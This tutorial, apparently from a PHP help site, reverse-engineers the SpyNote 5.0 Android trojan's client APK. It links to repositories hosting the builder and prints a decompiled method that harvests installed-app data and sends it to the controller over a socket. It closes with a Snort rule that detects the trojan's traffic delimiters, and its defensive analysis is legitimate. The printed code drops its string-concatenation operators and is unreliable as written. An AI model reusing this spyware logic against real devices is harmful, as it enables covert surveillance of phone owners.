How to perform reverse analysis of SpyNote5.0 Client_APK

1. What is SpyNote5.0?

SpyNote is a tool used to create Android malicious programs. Its functions are very eye-catching, including but not limited to reading contacts, recording, executing commands, managing applications, recording keyboards, performing GPS positioning, etc. These features play a key role when researching Android malware. We can have a preliminary understanding of its use through a series of articles, "SpyNote V5.0 graphical tool remote management Android phone tutorial", "Be careful, the Android Trojan tool SpyNote is free!" Remote monitoring is so simple", "Beware, Android remote control (spynote) has been upgraded..." and so on.

2. Preparing Tools

Few people are interested in the reverse analysis of SpyNote5.0 Client_APK. Below I will briefly introduce the use of tools, and then start the reverse analysis process.

1. SpyNote5.0

Download address: https://github.com/soDLL/SpyNote OR https://github.com/miladzero/SpyNote

2, jadx-gui

Download address: https://github.com/skylot/jadx/releases

3. androidkiller

Download address: https://www.guguzhu.com/soft/270509.html

3. Start reverse analysis

We start to analyze Client_APK. We usually like to drag the APK program generated by the client into androidkiller. Once the program is dragged into AndroidKiller, it will automatically disassemble and generate analysis results of the program.

On the left, Activity, Receiver, Service and application permissions (Uses-Permisson) are classified according to the inheritance relationship. You can see that the client requires many application permissions. On the right side is the smail assembly window and workbench. This tool can clearly display permissions and various inheritance relationships, but due to the lower version of the tool, the code restoration is not complete enough. I changed the tool and used jadx-gui, and then started reverse engineering and imported Client_APK.

We can see three packages, namely android.support, con.eset.ems2.gp, yps.eton.application. Among them, android.support is the Android support package, which includes low versions, v4, and v7. con.eset.ems2.gp is the configuration package which contains host, client_name and other information. yps.eton.application is what we need to analyze.

Open yps.eton.application, we can see 14 classes. Since there are many codes that need to be analyzed, some key codes are analyzed in a targeted manner.

It can be seen from the previous androidkiller analysis structure that the writing classes A, F, G, and k inherit Service, and Service represents continuous running in the background in the Android system. Let’s take a guess, what might be needed to continue running in Client_APK? Perhaps key objects will be continuously running, controlled, monitored, multi-threaded, etc. Our analysis focuses on some of its functions and how to identify traffic.

3.1 Command execution startup analysis

We start with method A, start the service first, then traverse the R object and get the third element, if it is equal to 1, execute the j() function. Otherwise, start the service after determining whether a() has been instantiated. It will then continue to determine whether j() has root permissions.

Continue to look at j(). After executing the su command in j(), write Do I have root? to the file /system/sd/temporary.txt. For Determine whether it has root permissions.

Next look at h(), which uses multi-threading to obtain the configuration parameters stored in the R object, and uses loops and sockets to return information.

3.2 Partial functional analysis of Base64 encoding application

When looking at the import list of object A, it was found that it contains android.util.Base64, indicating that during operation Base64 encoding is used. Then search for the keyword Base64, and you can see that Base64 is wrapped in ((BitmapDrawable) applicationIcon).getBitmap(), which is actually the application icon inside. The client passes some information through c0c1c3a2c0c1c segmentation ending in 9xf89fff9xf89, and uses fxf0x4x4x0fxf for exception information and options.

<br>

<br>

public void k() {        new Thread(new Runnable() {            public void run() {                String str;                try {                    StringBuffer stringBuffer = new StringBuffer();                    PackageManager packageManager = A.this.getApplicationContext().getPackageManager();                    for (ApplicationInfo applicationInfo : packageManager.getInstalledApplications(128)) {                        if (packageManager.getLaunchIntentForPackage(applicationInfo.packageName) != null && !packageManager.getLaunchIntentForPackage(applicationInfo.packageName).equals("")) {                            try {                                Date date = new Date(packageManager.getPackageInfo(applicationInfo.packageName, 4096).firstInstallTime);                                String str2 = packageManager.getLaunchIntentForPackage(applicationInfo.packageName) != null ? (applicationInfo.flags & 1) == 1 ? "system" : "user" : "";                                Drawable applicationIcon = packageManager.getApplicationIcon(applicationInfo.packageName);                                String str3 = new String();                                if (applicationIcon != null) {                                    Bitmap bitmap = ((BitmapDrawable) applicationIcon).getBitmap();                                    ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();                                    bitmap.compress(CompressFormat.JPEG, 50, byteArrayOutputStream);                                    str = Base64.encodeToString(byteArrayOutputStream.toByteArray(), 2);                                } else {                                    str = str3;                                }                                stringBuffer.append(packageManager.getApplicationLabel(applicationInfo) "c0c1c3a2c0c1c" applicationInfo.packageName "c0c1c3a2c0c1c" str "c0c1c3a2c0c1c" str2 "c0c1c3a2c0c1c" date.toString() "c0c1c3a2c0c1c" A.this.getPackageName() "9xf89fff9xf89");                            } catch (NameNotFoundException e) {                                A.this.h("applicationsfxf0x4x4x0fxf[My/Exception]" e.getMessage().toString());                            }                        }                    }                    A.this.h("applicationsfxf0x4x4x0fxf" stringBuffer.toString());                } catch (Exception e2) {                    A.this.h("applicationsfxf0x4x4x0fxf[My/Exception]" e2.getMessage().toString());                }            }        }).start();    }

3.3 信息获取部分功能分析

Object A contains a very lengthy method b, which uses too many switch case statement branches, causing an exception in the disassembly. It is not difficult to see from the comments that most of the logic for obtaining information is implemented in them. For example: Device info, System info, Sim info, WIFI info, etc., including the functions promoted by the tool.

#There are some things worth noting in the rewriting of method b, which is used to obtain the storage path. The delimiter of the transmission path information uses e1x1114x61114e. The file name information separator uses -1c0c1c3a2c0c1c-1c0c1c3a2c0c1c-1c0c1c3a2c0c1c. This information can be used to more accurately determine the client's operation during delivery.

4. Summary

During the analysis process, we can see the implementation of each function. When the client uses unencrypted and Base-encoded transmission, the most notable feature is the appearance of delimiters. The client's transmission behavior can be effectively judged through the program. So the packet is captured during the transmission process.

The delimiter symbols and base64 encoding content are clearly visible in the picture. For this point, we can write rules in Snort for identification. Example of identification:

alert tcp any any -> any any (content: "fxf0x4x4x0fxf"; sid:1; msg:SpyNote5.0 Client;)

The above is the detailed content of How to perform reverse analysis of SpyNote5.0 Client_APK. For more information, please follow other related articles on the PHP Chinese website!